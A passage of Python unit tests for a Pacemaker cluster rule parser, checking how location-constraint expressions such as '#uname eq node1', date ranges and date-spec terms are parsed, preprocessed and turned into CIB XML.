(literal #uname) (literal node1))", str(self.parser.parse(["#uname", "eq", "node1"])) ) self.assertEquals( "(ne (literal #uname) (literal node2))", str(self.parser.parse(["#uname", "ne", "node2"])) ) self.assertEquals( "(gt (literal int) (literal 123))", str(self.parser.parse(["int", "gt", "123"])) ) self.assertEquals( "(gte (literal int) (literal 123))", str(self.parser.parse(["int", "gte", "123"])) ) self.assertEquals( "(lt (literal int) (literal 123))", str(self.parser.parse(["int", "lt", "123"])) ) self.assertEquals( "(lte (literal int) (literal 123))", str(self.parser.parse(["int", "lte", "123"])) ) def testSimpleExpressionBad(self): self.assertSyntaxError( "unexpected 'eq'", ["eq"] ) self.assertUnexpectedEndOfInput(["#uname", "eq"]) self.assertSyntaxError( "unexpected 'node1'", ["#uname", "node1"] ) self.assertSyntaxError( "unexpected 'eq'", ["eq", "#uname"] ) self.assertSyntaxError( "unexpected 'eq'", ["eq", "lt"] ) self.assertSyntaxError( "unexpected 'string' before 'eq'", ["string", "#uname", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'date-spec' before 'eq'", ["date-spec", "hours=1", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'date-spec' after 'eq'", ["#uname", "eq", "date-spec", "hours=1"] ) self.assertSyntaxError( "unexpected 'duration' before 'eq'", ["duration", "hours=1", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'duration' after 'eq'", ["#uname", "eq", "duration", "hours=1"] ) def testDefinedExpression(self): self.assertEquals( "(defined (literal pingd))", str(self.parser.parse(["defined", "pingd"])) ) self.assertEquals( "(not_defined (literal pingd))", str(self.parser.parse(["not_defined", "pingd"])) ) def testDefinedExpressionBad(self): self.assertUnexpectedEndOfInput(["defined"]) self.assertUnexpectedEndOfInput(["not_defined"]) self.assertSyntaxError( "unexpected 'eq'", ["defined", "eq"] ) self.assertSyntaxError( "unexpected 'and'", ["defined", "and"] ) self.assertSyntaxError( "unexpected 'string' after 'defined'", ["defined", "string", "pingd"] ) self.assertSyntaxError( "unexpected 'date-spec' after 'defined'", ["defined", "date-spec", "hours=1"] ) self.assertSyntaxError( "unexpected 'duration' after 'defined'", ["defined", "duration", "hours=1"] ) def testTypeExpression(self): self.assertEquals( "(eq (literal #uname) (string (literal node1)))", str(self.parser.parse(["#uname", "eq", "string", "node1"])) ) self.assertEquals( "(eq (literal #uname) (integer (literal 12345)))", str(self.parser.parse(["#uname", "eq", "integer", "12345"])) ) self.assertEquals( "(eq (literal #uname) (integer (literal -12345)))", str(self.parser.parse(["#uname", "eq", "integer", "-12345"])) ) self.assertEquals( "(eq (literal #uname) (version (literal 1)))", str(self.parser.parse(["#uname", "eq", "version", "1"])) ) self.assertEquals( "(eq (literal #uname) (version (literal 1.2.3)))", str(self.parser.parse(["#uname", "eq", "version", "1.2.3"])) ) self.assertEquals( "(eq (literal #uname) (string (literal string)))", str(self.parser.parse(["#uname", "eq", "string", "string"])) ) self.assertEquals( "(eq (literal #uname) (string (literal and)))", str(self.parser.parse(["#uname", "eq", "string", "and"])) ) self.assertEquals( "(and " "(ne (literal #uname) (string (literal integer))) " "(ne (literal #uname) (string (literal version)))" ")", str(self.parser.parse([ "#uname", "ne", "string", "integer", "and", "#uname", "ne", "string", "version" ])) ) def testTypeExpressionBad(self): self.assertUnexpectedEndOfInput(["string"]) self.assertUnexpectedEndOfInput(["#uname", "eq", "string"]) self.assertSyntaxError( "unexpected 'string' before 'eq'", ["string", "#uname", "eq", "node1"] ) self.assertSyntaxError( "invalid integer value 'node1'", ["#uname", "eq", "integer", "node1"] ) self.assertSyntaxError( "invalid version value 'node1'", ["#uname", "eq", "version", "node1"] ) def testDateExpression(self): self.assertEquals( "(gt (literal date) (literal 2014-06-26))", str(self.parser.parse(["date", "gt", "2014-06-26"])) ) self.assertEquals( "(lt (literal date) (literal 2014-06-26))", str(self.parser.parse(["date", "lt", "2014-06-26"])) ) self.assertEquals( "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ")", str(self.parser.parse([ "date", "in_range", "2014-06-26", "to", "2014-07-26" ])) ) self.assertEquals( "(in_range " "(literal date) " "(literal 2014-06-26) (duration (literal years=1))" ")", str(self.parser.parse([ "date", "in_range", "2014-06-26", "to", "duration", "years=1" ])) ) def testDateExpressionBad(self): self.assertUnexpectedEndOfInput( ["date", "in_range"] ) self.assertSyntaxError( "missing 'to'", ["date", "in_range", '2014-06-26'] ) self.assertUnexpectedEndOfInput( ["date", "in_range", "2014-06-26", "to"] ) self.assertSyntaxError( "unexpected 'in_range'", ["in_range", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "expecting 'to', got 'eq'", ["date", "in_range", '#uname', "eq", "node1", "to", "2014-07-26"] ) self.assertSyntaxError( "invalid date '#uname' in 'in_range ... to'", ["date", "in_range", "2014-06-26", "to", '#uname', "eq", "node1"] ) self.assertSyntaxError( "unexpected 'defined' after 'in_range'", ["date", "in_range", "defined", "pingd", "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'defined' after 'in_range ... to'", ["date", "in_range", "2014-06-26", "to", "defined", "pingd"] ) self.assertSyntaxError( "unexpected 'string' before 'in_range'", ["string", "date", "in_range", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'string' after 'in_range'", ["date", "in_range", "string", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'string' after 'in_range ... to'", ["date", "in_range", '2014-06-26', "to", "string", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'string' after '2014-06-26'", ["date", "in_range", '2014-06-26', "string", "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected '#uname' before 'in_range'", ["#uname", "in_range", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "invalid date '2014-13-26' in 'in_range ... to'", ["date", "in_range", '2014-13-26', "to", "2014-07-26"] ) self.assertSyntaxError( "invalid date '2014-13-26' in 'in_range ... to'", ["date", "in_range", '2014-06-26', "to", "2014-13-26"] ) def testAndOrExpression(self): self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "#uname", "ne", "node2" ])) ) self.assertEquals( "(or " "(eq (literal #uname) (literal node1)) " "(eq (literal #uname) (literal node2))" ")", str(self.parser.parse([ "#uname", "eq", "node1", "or", "#uname", "eq", "node2" ])) ) self.assertEquals( "(and " "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ") " "(ne (literal #uname) (literal node3))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "and", "#uname", "ne", "node3" ])) ) self.assertEquals( "(or " "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ") " "(eq (literal #uname) (literal node3))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "or", "#uname", "eq", "node3" ])) ) self.assertEquals( "(and " "(or " "(eq (literal #uname) (literal node1)) " "(eq (literal #uname) (literal node2))" ") " "(ne (literal #uname) (literal node3))" ")", str(self.parser.parse([ "#uname", "eq", "node1", "or", "#uname", "eq", "node2", "and", "#uname", "ne", "node3" ])) ) self.assertEquals( "(and " "(defined (literal pingd)) " "(lte (literal pingd) (literal 1))" ")", str(self.parser.parse([ "defined", "pingd", "and", "pingd", "lte", "1" ])) ) self.assertEquals( "(or " "(gt (literal pingd) (literal 1)) " "(not_defined (literal pingd))" ")", str(self.parser.parse([ "pingd", "gt", "1", "or", "not_defined", "pingd" ])) ) def testAndOrExpressionDateSpec(self): self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(date-spec (literal hours=1-12))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "date-spec", "hours=1-12" ])) ) self.assertEquals( "(or " "(date-spec (literal monthdays=1-12)) " "(ne (literal #uname) (literal node1))" ")", str(self.parser.parse([ "date-spec", "monthdays=1-12", "or", "#uname", "ne", "node1" ])) ) self.assertEquals( "(or " "(date-spec (literal monthdays=1-10)) " "(date-spec (literal monthdays=11-20))" ")", str(self.parser.parse([ "date-spec", "monthdays=1-10", "or", "date-spec", "monthdays=11-20" ])) ) def testAndOrExpressionDate(self): self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ")" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "date", "in_range", "2014-06-26", "to", "2014-07-26" ])) ) self.assertEquals( "(and " "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ") " "(ne (literal #uname) (literal node1))" ")", str(self.parser.parse([ "date", "in_range", "2014-06-26", "to", "2014-07-26", "and", "#uname", "ne", "node1" ])) ) def testAndOrExpressionBad(self): self.assertSyntaxError( "unexpected 'and'", ["and"] ) self.assertSyntaxError( "unexpected 'or'", ["or"] ) self.assertSyntaxError( "unexpected '#uname' before 'and'", ["#uname", "and", "node1"] ) self.assertSyntaxError( "unexpected '#uname' before 'or'", ["#uname", "or", "node1"] ) self.assertSyntaxError( "unexpected '#uname' before 'or'", ["#uname", "or", "eq"] ) self.assertSyntaxError( "unexpected 'node2' after 'and'", ["#uname", "eq", "node1", "and", "node2"] ) self.assertUnexpectedEndOfInput(["#uname", "eq", "node1", "and"]) self.assertUnexpectedEndOfInput( ["#uname", "eq", "node1", "and", "#uname", "eq"] ) self.assertSyntaxError( "unexpected 'and'", ["and", "#uname", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'duration' after 'and'", ["#uname", "ne", "node1", "and", "duration", "hours=1"] ) self.assertSyntaxError( "unexpected 'duration' before 'or'", ["duration", "monthdays=1", "or", "#uname", "ne", "node1"] ) def testParenthesizedExpression(self): self.assertSyntaxError( "missing one of 'eq', 'ne', 'lt', 'gt', 'lte', 'gte', 'in_range', " "'defined', 'not_defined', 'date-spec'", ["(", "#uname", ")"] ) self.assertEquals( "(date-spec (literal hours=1))", str(self.parser.parse(["(", "date-spec", "hours=1", ")"])) ) self.assertEquals( "(eq (literal #uname) (literal node1))", str(self.parser.parse(["(", "#uname", "eq", "node1", ")"])) ) self.assertEquals( "(defined (literal pingd))", str(self.parser.parse(["(", "defined", "pingd", ")"])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ")", str(self.parser.parse([ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")" ])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ")", str(self.parser.parse([ "(", "#uname", "ne", "node1", ")", "and", "(", "#uname", "ne", "node2", ")" ])) ) self.assertEquals( "(or " "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ") " "(eq (literal #uname) (literal node3))" ")", str(self.parser.parse([ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "or", "#uname", "eq", "node3" ])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(or " "(ne (literal #uname) (literal node2)) " "(eq (literal #uname) (literal node3))" ")" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "(", "#uname", "ne", "node2", "or", "#uname", "eq", "node3", ")" ])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(or " "(ne (literal #uname) (literal node2)) " "(eq (literal #uname) (literal node3))" ")" ")", str(self.parser.parse([ "(", "(", "(", "#uname", "ne", "node1", ")", "and", "(", "(", "(", "#uname", "ne", "node2", ")", "or", "(", "#uname", "eq", "node3", ")", ")", ")", ")", ")" ])) ) self.assertEquals( "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ")", str(self.parser.parse([ "(", "date", "in_range", "2014-06-26", "to", "2014-07-26", ")" ])) ) def testParenthesizedExpressionBad(self): self.assertUnexpectedEndOfInput(["("]) self.assertSyntaxError( "unexpected ')'", ["(", ")"] ) self.assertSyntaxError( "missing ')'", ["(", "#uname"] ) self.assertUnexpectedEndOfInput(["(", "#uname", "eq"]) self.assertSyntaxError( "missing ')'", ["(", "#uname", "eq", "node1"] ) def assertUnexpectedEndOfInput(self, program): self.assertRaises(rule.UnexpectedEndOfInput, self.parser.parse, program) def assertSyntaxError(self, syntax_error, program): self.assertRaises( rule.SyntaxError, self.parser.parse, program ) try: self.parser.parse(program) except rule.SyntaxError as e: self.assertEquals(syntax_error, str(e)) class CibBuilderTest(unittest.TestCase): def setUp(self): self.parser = rule.RuleParser() self.builder = rule.CibBuilder() def testSingleLiteralDatespec(self): self.assertExpressionXml( ["date-spec", "hours=1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec hours="1" id="location-dummy-rule-expr-datespec"/> </date_expression> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date-spec", "hours=1-14 monthdays=20-30 months=1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec hours="1-14" id="location-dummy-rule-expr-datespec" monthdays="20-30" months="1"/> </date_expression> </rule> </rsc_location> """ ) def testSimpleExpression(self): self.assertExpressionXml( ["#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "ne", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "gt", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="gt" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "gte", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="gte" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "lt", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="lt" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "lte", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="lte" value="node1"/> </rule> </rsc_location> """ ) def testTypeExpression(self): self.assertExpressionXml( ["#uname", "eq", "string", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" type="string" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "eq", "integer", "12345"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" type="number" value="12345"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "eq", "version", "1.2.3"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" type="version" value="1.2.3"/> </rule> </rsc_location> """ ) def testDefinedExpression(self): self.assertExpressionXml( ["defined", "pingd"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="defined"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["not_defined", "pingd"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="not_defined"/> </rule> </rsc_location> """ ) def testDateExpression(self): self.assertExpressionXml( ["date", "gt", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="gt" start="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "lt", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression end="2014-06-26" id="location-dummy-rule-expr" operation="lt"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "in_range", "2014-06-26", "to", "2014-07-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression end="2014-07-26" id="location-dummy-rule-expr" operation="in_range" start="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "in_range", "2014-06-26", "to", "duration", "years=1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="in_range" start="2014-06-26"> <duration id="location-dummy-rule-expr-duration" years="1"/> </date_expression> </rule> </rsc_location> """ ) def testNotDateExpression(self): self.assertExpressionXml( ["date", "eq", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="eq" value="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "gt", "string", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="gt" type="string" value="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "gt", "integer", "12345"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="gt" type="number" value="12345"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "gt", "version", "1.2.3"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="gt" type="version" value="1.2.3"/> </rule> </rsc_location> """ ) def testAndOrExpression(self): self.assertExpressionXml( ["#uname", "ne", "node1", "and", "#uname", "ne", "node2"], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node2"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "eq", "node1", "or", "#uname", "eq", "node2"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="eq" value="node2"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "and", "#uname", "ne", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node2"/> <expression attribute="#uname" id="location-dummy-rule-expr-2" operation="ne" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "or", "#uname", "eq", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <rule boolean-op="and" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="ne" value="node2"/> </rule> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "#uname", "eq", "node1", "or", "#uname", "eq", "node2", "and", "#uname", "ne", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <rule boolean-op="or" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="eq" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="eq" value="node2"/> </rule> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["defined", "pingd", "and", "pingd", "lte", "1"], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="defined"/> <expression attribute="pingd" id="location-dummy-rule-expr-1" operation="lte" value="1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["pingd", "gt", "1", "or", "not_defined", "pingd"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="gt" value="1"/> <expression attribute="pingd" id="location-dummy-rule-expr-1" operation="not_defined"/> </rule> </rsc_location> """ ) def testAndOrExpressionDateSpec(self): self.assertExpressionXml( ["#uname", "ne", "node1", "and", "date-spec", "hours=1-12"], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <date_expression id="location-dummy-rule-expr-1" operation="date_spec"> <date_spec hours="1-12" id="location-dummy-rule-expr-1-datespec"/> </date_expression> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date-spec", "monthdays=1-12", "or", "#uname", "ne", "node1"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec id="location-dummy-rule-expr-datespec" monthdays="1-12"/> </date_expression> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date-spec", "monthdays=1-10", "or", "date-spec", "monthdays=11-20"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec id="location-dummy-rule-expr-datespec" monthdays="1-10"/> </date_expression> <date_expression id="location-dummy-rule-expr-1" operation="date_spec"> <date_spec id="location-dummy-rule-expr-1-datespec" monthdays="11-20"/> </date_expression> </rule> </rsc_location> """ ) def testParenthesizedExpression(self): self.assertExpressionXml( [ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "or", "#uname", "eq", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <rule boolean-op="and" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="ne" value="node2"/> </rule> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "#uname", "ne", "node1", "and", "(", "#uname", "ne", "node2", "or", "#uname", "eq", "node3", ")" ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <rule boolean-op="or" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node2"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="eq" value="node3"/> </rule> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "or", "(", "#uname", "ne", "node3", "and", "#uname", "ne", "node4", ")", ], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <rule boolean-op="and" id="location-dummy-rule-rule"> <expression attribute="#uname" id="location-dummy-rule-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-rule-expr-1" operation="ne" value="node2"/> </rule> <rule boolean-op="and" id="location-dummy-rule-rule-1"> <expression attribute="#uname" id="location-dummy-rule-rule-1-expr" operation="ne" value="node3"/> <expression attribute="#uname" id="location-dummy-rule-rule-1-expr-1" operation="ne" value="node4"/> </rule> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "and", "(", "#uname", "ne", "node3", "and", "#uname", "ne", "node4", ")", ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node2"/> <expression attribute="#uname" id="location-dummy-rule-expr-2" operation="ne" value="node3"/> <expression attribute="#uname" id="location-dummy-rule-expr-3" operation="ne" value="node4"/> </rule> </rsc_location> """ ) def assertExpressionXml(self, rule_expression, rule_xml): cib_dom = xml.dom.minidom.parse("empty.xml") constraints = cib_dom.getElementsByTagName("constraints")[0] constraint_el = constraints.appendChild( cib_dom.createElement("rsc_location") ) constraint_el.setAttribute("id", "location-dummy") ac( self.builder.build( constraint_el, self.parser.parse(rule_expression) ).parentNode.toprettyxml(indent=" "), rule_xml.lstrip().rstrip(" ") ) class TokenPreprocessorTest(unittest.TestCase): def setUp(self): self.preprocessor = rule.TokenPreprocessor() def testNoChanges(self): self.assertEquals([], self.preprocessor.run([])) self.assertEquals( ["#uname", "eq", "node1"], self.preprocessor.run(["#uname", "eq", "node1"]) ) def testDateSpec(self): self.assertEquals( ["date-spec"], self.preprocessor.run(["date-spec"]) ) self.assertEquals( ["date-spec", "hours=14"], self.preprocessor.run(["date-spec", "hours=14"]) ) self.assertEquals( ["date-spec", "hours weeks=6 months= moon=1"], self.preprocessor.run( ["date-spec", "hours", "weeks=6", "months=", "moon=1"] ) ) self.assertEquals( ["date-spec", "foo", "hours=14"], self.preprocessor.run(["date-spec", "foo", "hours=14"]) ) self.assertEquals( ["date-spec", "hours=14", "foo", "hours=14"], self.preprocessor.run(["date-spec", "hours=14", "foo", "hours=14"]) ) self.assertEquals( [ "date-spec", "hours=1 monthdays=2 weekdays=3 yeardays=4 months=5 " "weeks=6 years=7 weekyears=8 moon=9" ], self.preprocessor.run([ "date-spec", "hours=1", "monthdays=2", "weekdays=3", "yeardays=4", "months=5","weeks=6", "years=7", "weekyears=8", "moon=9" ]) ) self.assertEquals( ["#uname", "eq", "node1", "or", "date-spec", "hours=14"], self.preprocessor.run([ "#uname", "eq", "node1", "or", "date-spec", "hours=14" ]) ) self.assertEquals( ["date-spec", "hours=14", "or", "#uname", "eq", "node1"], self.preprocessor.run([ "date-spec", "hours=14", "or", "#uname", "eq", "node1", ]) ) def testDuration(self): self.assertEquals( ["duration"], self.preprocessor.run(["duration"]) ) self.assertEquals( ["duration", "hours=14"], self.preprocessor.run(["duration", "hours=14"]) ) self.assertEquals( ["duration", "hours weeks=6 months= moon=1"], self.preprocessor.run( ["duration", "hours", "weeks=6", "months=", "moon=1"] ) ) self.assertEquals( ["duration", "foo", "hours=14"], self.preprocessor.run(["duration", "foo", "hours=14"]) ) self.assertEquals( ["duration", "hours=14", "foo", "hours=14"], self.preprocessor.run(["duration", "hours=14", "foo", "hours=14"]) ) self.assertEquals( [ "duration", "hours=1 monthdays=2 weekdays=3 yeardays=4 months=5 " "weeks=6 years=7 weekyears=8 moon=9" ], self.preprocessor.run([ "duration", "hours=1", "monthdays=2", "weekdays=3", "yeardays=4", "months=5","weeks=6", "years=7", "weekyears=8", "moon=9" ]) ) self.assertEquals( ["#uname", "eq", "node1", "or", "duration", "hours=14"], self.preprocessor.run([ "#uname", "eq", "node1", "or", "duration", "hours=14" ]) ) self.assertEquals( ["duration", "hours=14", "or", "#uname", "eq", "node1"], self.preprocessor.run([ "duration", "hours=14", "or", "#uname", "eq", "node1", ]) ) def testOperationDatespec(self): self.assertEquals( ["date-spec", "weeks=6 moon=1"], self.preprocessor.run( ["date-spec", "operation=date_spec", "weeks=6", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6 moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "operation=date_spec", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6", "foo", "moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "operation=date_spec", "foo", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6", "foo", "operation=date_spec", "moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "foo", "operation=date_spec", "moon=1"] ) ) self.assertEquals( ["date-spec", "weeks=6 moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "moon=1", "operation=date_spec"] ) ) self.assertEquals( ["date-spec", "weeks=6 moon=1", "foo"], self.preprocessor.run( ["date-spec", "weeks=6", "moon=1", "operation=date_spec", "foo"] ) ) self.assertEquals( ["date-spec"], self.preprocessor.run( ["date-spec", "operation=date_spec"] ) ) self.assertEquals( ["date-spec", "weeks=6", "operation=foo", "moon=1"], self.preprocessor.run( ["date-spec", "weeks=6", "operation=foo", "moon=1"] ) ) def testDateLegacySyntax(self): # valid syntax self.assertEquals( ["date", "gt", "2014-06-26"], self.preprocessor.run([ "date", "start=2014-06-26", "gt" ]) ) self.assertEquals( ["date", "lt", "2014-06-26"], self.preprocessor.run([ "date", "end=2014-06-26", "lt" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "in_range" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26"], self.preprocessor.run([ "date", "end=2014-07-26", "start=2014-06-26", "in_range" ]) ) self.assertEquals( ["date", "gt", "2014-06-26", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "gt", "foo" ]) ) self.assertEquals( ["date", "lt", "2014-06-26", "foo"], self.preprocessor.run([ "date", "end=2014-06-26", "lt", "foo" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "in_range", "foo" ]) ) self.assertEquals( ["date", "in_range", "2014-06-26", "to", "2014-07-26", "foo"], self.preprocessor.run([ "date", "end=2014-07-26", "start=2014-06-26", "in_range", "foo" 